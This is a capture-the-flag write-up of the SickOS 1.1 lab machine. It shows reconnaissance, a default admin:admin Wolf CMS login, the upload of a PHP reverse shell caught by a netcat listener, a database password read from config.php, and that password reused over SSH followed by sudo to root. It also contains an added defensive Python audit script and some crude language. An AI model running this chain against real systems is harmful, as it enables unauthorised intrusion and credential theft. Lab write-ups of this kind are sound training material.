
# netdiscover

Machine IP -> 192.168.1.44

#nmap -sS -sV -O -v 192.168.1.44
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 08:00:27:AC:FC:75 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
...

axxxx proxy waxxx proxy -BITCH HOW TO SET PROXY SETTINGS ON FIREFOX? Firefox > Preferences > Advanced > Network tab > Connection Settings


I reached the site; first I look at the robots.txt file.

User-agent: *
Dissalow: /wolfcms

Wolf CMS is installed; with a little research I found the admin page and the default login, and logged in.

192.168.1.44/wolfcms/?admin

I logged in with usr:admin pass:admin.

After poking around a bit, I noticed the file upload section.

I created a folder named shell under public.

I uploaded the file named php-reverse-shell.php (pentestmonkey).

Before running the file from the http://192.168.1.34/wolfcms/public/shell/ index, I run the command

# nc -nlv 666

and listen for connections coming in on port 666.

# nc -nlvp 666
Listening on [0.0.0.0] (family 0, port 666)
Connection from 192.168.1.34 60312 received!
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
04:33:45 up 49 min, 0 users, load average: 0.01, 0.02, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ echo os.system('/bin/bash')
/bin/sh: 1: Syntax error: "(" unexpected
$ cd /var/www/wolfcms
$ ls -larh
total 52K
drwxrwxrwx 7 root root 4.0K Dec 5 2015 wolf
-rwxrwxrwx 1 root root 0 Dec 5 2015 robots.txt
drwxrwxrwx 5 root root 4.0K Jul 24 21:53 public
-rwxrwxrwx 1 root root 6.7K Dec 5 2015 index.php
-rwxrwxrwx 1 root root 894 Dec 5 2015 favicon.ico
drwxrwxrwx 2 root root 4.0K Dec 5 2015 docs
-rwxrwxrwx 1 root root 3.0K Dec 5 2015 config.php
-rwxrwxrwx 1 root root 403 Dec 5 2015 composer.json
-rwxrwxrwx 1 root root 2.4K Dec 5 2015 README.md
-rwxrwxrwx 1 root root 4.0K Dec 5 2015 CONTRIBUTING.md
-rwxr-xr-x 1 root root 950 Dec 5 2015 .htaccess
drwxrwxrwx 3 root root 4.0K Dec 6 2015 ..
drwxr-xr-x 5 root root 4.0K Dec 5 2015 .

Since the config.php file may contain user credentials, I look at it first.

shell$ cat config.php
...
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
...

lel rekt
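
A defender-side audit for the weaknesses visible in the listing and config.php above (world-writable files, a PHP script sitting under the upload directory, the application connecting to MySQL as root), as an added example that is not part of the original write-up. The function names, finding labels and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Matches PHP constants such as define('DB_USER', 'root');
DEFINE_RE = re.compile(r"define\(\s*'(\w+)'\s*,\s*'([^']*)'\s*\)")

def audit_webroot(root, upload_dir="public"):
    """Return sorted (relative_path, finding) pairs for a web root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode
            # Any local account, including the web server user, can rewrite it.
            if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            # Scripts inside the upload area run with the web server's rights.
            if rel.split(os.sep)[0] == upload_dir and name.lower().endswith(".php"):
                findings.append((rel, "php-in-upload-dir"))
            if name == "config.php":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    consts = dict(DEFINE_RE.findall(fh.read()))
                # The CMS should use a dedicated, low-privilege database account.
                if consts.get("DB_USER") == "root":
                    findings.append((rel, "db-user-is-root"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample mirroring the listing above; the password is a placeholder."""
    os.makedirs(os.path.join(root, "public", "shell"))
    samples = {
        "config.php": ("<?php\ndefine('DB_USER', 'root');\n"
                       "define('DB_PASS', 'PLACEHOLDER');\n", 0o777),
        "index.php": ("<?php // front controller\n", 0o644),
        os.path.join("public", "shell", "upload.php"): ("<?php // constructed\n", 0o644),
    }
    for rel, (body, mode) in samples.items():
        path = os.path.join(root, rel)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)  # set explicitly so the umask does not interfere

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, finding in audit_webroot(tmp):
            print(f"{finding:20} {rel}")
```
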

While browsing around the machine, I saw the sickos directory under the home directory.

From this I understood that there is a user named sickos.

I try to connect using the password I found.

#ssh [email protected]
[email protected]'s password:
...
[email protected]:~$ id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
[email protected]:~$ sudo su
[sudo] password for sickos:
[email protected]:/home/sickos# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# cd /root
[email protected]:~# ls -larh
total 40K
-rw------- 1 root root 5.2K Dec 6 2015 .viminfo
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-rw------- 1 root root 22 Dec 5 2015 .mysql_history
drwx------ 2 root root 4.0K Sep 22 2015 .cache
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
-rw------- 1 root root 3.7K Dec 6 2015 .bash_history
-rw-r--r-- 1 root root 96 Dec 6 2015 a0216ea4d51874464078c618298b1367.txt
drwxr-xr-x 22 root root 4.0K Sep 22 2015 ..
drwx------ 3 root root 4.0K Dec 6 2015 .
[email protected]:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!

You have Succesfully completed SickOS1.1.

bb